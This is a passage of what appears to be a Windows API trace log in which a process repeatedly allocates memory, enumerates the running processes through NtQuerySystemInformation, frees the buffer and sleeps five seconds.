RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.880] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.936] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.946] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.955] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0277.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0277.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0277.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0277.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0277.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0277.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0277.970] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.008] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.018] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.041] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.050] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.060] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.068] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.077] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.096] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.105] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.113] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.122] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.131] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.140] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.149] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) 